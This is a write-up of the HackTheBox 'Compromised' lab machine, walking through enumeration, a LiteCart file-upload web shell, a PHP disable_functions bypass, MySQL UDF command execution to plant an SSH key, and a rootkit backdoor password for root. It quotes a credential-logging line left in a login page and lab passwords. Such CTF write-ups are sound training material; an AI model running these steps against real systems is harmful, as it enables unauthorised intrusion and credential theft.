> For the complete documentation index, see [llms.txt](https://akshaydeepakshinde.gitbook.io/hackthebox-linux/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://akshaydeepakshinde.gitbook.io/hackthebox-linux/hackthebox-compromised.md).

# HackTheBox - Compromised

![](/files/-MZxT0TM0-sg2fALKV1t)

### Nmap scan results

![](/files/-MZxStcS8jCWWk1McpOO)

Adding **`compromised.htb`** to /etc/hosts file. Also starting off a **all port scan** in the background.

![](/files/-MZxTVHGcdF8P4KJQVY0)

### Using gobuster to scan for directories and files

```haskell
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://compromised.htb/ -o go-dirscan.out -x php,html,tx
```

![](/files/-MZxUaaawglLSTr8Kd4u)

![](/files/-MZxUCQVB7NHShAaBB28)

![](/files/-MZxUpWe06zsM1VXJZy6)

### Using timestamps to get recently modified files

Now that we have backup files for the CMS running, we can potentially search for config files. There is this one trick that I learned from **ippsec** (Using timestamps to get the recently modified files)

```haskell
find . -printf "%T+ %p\n" -type f | sort -u
```

![](/files/-MZxVjmCuekdi_kA8sAm)

```c
2020-09-03+17:19:16.0000000000 ./includes/library
2020-09-03+17:19:16.0000000000 ./includes/library/lib_user.inc.php
2020-09-03+17:20:34.0000000000 ./admin/login.php
2020-09-03+17:20:56.0000000000 ./admin
// These were the recently modified files
```

```c
<?php
  require_once('../includes/app_header.inc.php');

  document::$template = settings::get('store_template_admin');
  document::$layout = 'login';

  if (!empty($_GET['redirect_url'])) {
    $redirect_url = (basename(parse_url($_REQUEST['redirect_url'], PHP_URL_PATH)) != basename(__FILE__)) ? $_REQUEST['redirect_url'] : document::link(WS_DIR_ADMIN);
  } else {
    $redirect_url = document::link(WS_DIR_ADMIN);
  }

  header('X-Robots-Tag: noindex');
  document::$snippets['head_tags']['noindex'] = '<meta name="robots" content="noindex" />';

  if (!empty(user::$data['id'])) notices::add('notice', language::translate('text_already_logged_in', 'You are already logged in'));

  if (isset($_POST['login'])) {
    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
    user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
  }

  if (empty($_POST['username']) && !empty($_SERVER['PHP_AUTH_USER'])) $_POST['username'] = !empty($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : '';

  $page_login = new view();
  $page_login->snippets = array(
    'action' => $redirect_url,
  );
  echo $page_login->stitch('pages/login');

  require_once vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_INCLUDES . 'app_footer.inc.php');

?>
```

```c
if (isset($_POST['login'])) {
    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
    user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
  }
```

The above code is logging the username and password for admin into **`.log2301c9430d8593ae.txt`** file. Maybe we can still access that file, let's try that.

> **User: admin   Passwd: theNextGenSt0r3!\~**

### Exploiting LiteCart (Vulnerable to Arbitrary File Upload)

**`Version Used : LiteCart 2.1.2`**

![](/files/-MZxYLSKdewW69c8qjnt)

![](/files/-MZxYX7yjvNGUl9PyBpJ)

Upload a php file and change the **Content-Type** to `application/xml`.&#x20;

![](/files/-MZxYz4BkVHQrRwVAi8F)

Now visit <http://compromised.htb/shop/vqmod/xml/demo.php> and you should get the following page.&#x20;

![](/files/-MZxZAi9tM2HksTK-gPm)

### PHP disable\_functions bypass

But the only problem is that we can't run system executing commands on php. This can be because of PHP [disabled ](https://www.a2hosting.in/kb/developer-corner/php/using-php.ini-directives/php-disable_functions-directive)[functions](https://www.a2hosting.in/kb/developer-corner/php/using-php.ini-directives/php-disable_functions-directive). To check it ,we can execute **`phpinfo()`** command.

![](/files/-MZx_WdJodzlBD59FuWn)

There are two ways to get a shell on the box. The first way is to use weevely (**Weevely** is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.) and the another way is to use **`disable_functions bypass - PHP 7.0-7.4`** script.

{% embed url="<https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only>" %}

Get the exploit from [here ](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php)and upload it. We can even modify the script a bit to accept a GET/POST request and execute it, rather than manually entering the values.

![](/files/-MZxcfHDZllYUX-836Ig)

![](/files/-MZxd1TzEU5FMGptzjDA)

We can't get a reverse shell because of the firewall rules. To check the **`iptables`** rules, we can browse to **`/etc/iptables`** and list for rules.

```c
# Generated by iptables-save v1.6.1 on Mon May 11 02:27:29 2020
*filter
:INPUT DROP [6:1032]
:FORWARD DROP [0:0]
:OUTPUT DROP [5:394]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -m tcp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -m tcp -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -m tcp -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -m tcp -j ACCEPT
COMMIT
# Completed on Mon May 11 02:27:29 2020

```

Instead we can use forward shell.

{% embed url="<https://github.com/IppSec/forward-shell>" %}

### Using forward shell to shell access

![](/files/-MZxeVCEbjLOU45w5APu)

We can even upgrade the shell (Uses **`pty`** from python) by typing upgrade command.

{% hint style="info" %}
The **pty** module defines operations for handling the pseudo-terminal concept: starting another process and being able to write to and read from its controlling terminal programmatically. ... Connect the child's controlling terminal to a pseudo-terminal. Return value is (pid, fd) .
{% endhint %}

![](/files/-MZxepiS4tFdHtAZT4p4)

### Misconfiguration in MySQL

```c
// Database Configs
  define('DB_TYPE', 'mysql');                                                                                                                                                                 
  define('DB_SERVER', 'localhost');                                                                                                                                                           
  define('DB_USERNAME', 'root');
  define('DB_PASSWORD', 'changethis');
  define('DB_DATABASE', 'ecom');
  define('DB_TABLE_PREFIX', 'lc_');
  define('DB_CONNECTION_CHARSET', 'utf8');
  define('DB_PERSISTENT_CONNECTIONS', 'false');
```

MySQL user has given a shell, usually it is set to **`/bin/false`** but now it is set to **`/bin/bash`** which is strange. That means we can SSH into that user.

```c
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash
```

Let's see if **mysql** has UDF(User-defined functions) present. We have creds to connect.

![](/files/-MZxg8Z1BrFDINaXfreB)

Looks like we run commands as mysql user.

![](/files/-MZxgR-eNtZbwqmc24_G)

One thing that we can do is create a **`.ssh`** directory and then copy the contents of our **`public key`** into it. This is how we can get shell as mysql using SSH Protocol.

```c
// Create a pair of SSH Keys
ssh-keygen -f mysql
```

```c
select exec_cmd('mkdir .ssh');
select exec_cmd('echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCkB5LPkMjts3c9RE8ea1ftX+xMCA2ppgNYP5B1mxkW/3vR185WS+KamWjrTZ3NImNkWuC2MEn1og6aIUZ4R0jPvccHeX0urY2wH4AFnjKL6Hu03hra2HWt3ca2SgiKgKHjZUWWlVeow5tTlWSDgJQ12faugpn6sWfPYmPMX/iVIiCBRbURVRDQP+7c/MUCqEmtITwH8atCFNyjLHM7B9d210SJb+1eP++ZDydFFpd1bMhe79ABwHY5YC1Lm3h0cZTYjGicbwVp0RLIUIrtyz0Y8u/I+2nZyINLYEYeIUDavLBK/B/BrX8NgsQoH/n9cEboBKN+MSsaWYx3exIXB8chUZkoPQ4xff3qfiGYsO5xO2GnBscmkicGWTNOXKpGj9iYZTX654XtUBRBJwcJFuxg46i+9SNlkxj/xHLYeIHfBNPe+DyRgg2k/E4bTnzbC8La1Sa3CJpMUqzPWRwrhBeLrp2ThowNOuDYokjYBpeAu6tA2XyDPGfCZkhvntncV5U= root@LAPTOP-UFMALO92" > .ssh/authorized_keys');
select exec_cmd('chmod 600 .ssh/authorized_keys');
```

![](/files/-MZxh_7N12rv00g6GU18)

### Analyzing the strace-log.dat (Keylogger)

![](/files/-MZxkSQhBjxJtNm-cZ5F)

This strace-dat.log file is logging all the keys, if you will observe it properly you can see a pattern. See the screenshot below.

![](/files/-MZxkX1hZmCC7RV3wrSV)

```c
mysql -u root --password 3*NLJE32I$Fe
```

![](/files/-MZxl0BACsCYnvzdb1NP)

Also the password for sysadmin : **`3*NLJE32I$Fe`**

![](/files/-MZxlJGWOLS9abQd6nDp)

### Exploiting LD\_PRELOAD Rootkit (libdate.so)

![](/files/-MZxnbvPV_Z-auoyvwDF)

We can analyze the libdate.so file in ghidra. Get that file using scp.

```c
scp sysadmin@10.10.10.207:/lib/x86_64-linux-gnu/libdate.so .
```

![](/files/-MZxoJZAZvsQs_tlpxSH)

So after reading the **`local_x`** variables, if it's equal then it will run **`/bin/sh`** command. Let's decode that variable values using [Cyberchef](https://gchq.github.io/CyberChef/).

Decoded Value : **`2wkeOU4sjv84ok/`**

So upon execution of SUID Binary (binary should accept input from the user), if we enter the value that we just decoded, we will get a root shell. Let's try that on **`su (substitute user)`**&#x62;inary.

![](/files/-MZxp4xYbVcYGZiOT_xq)
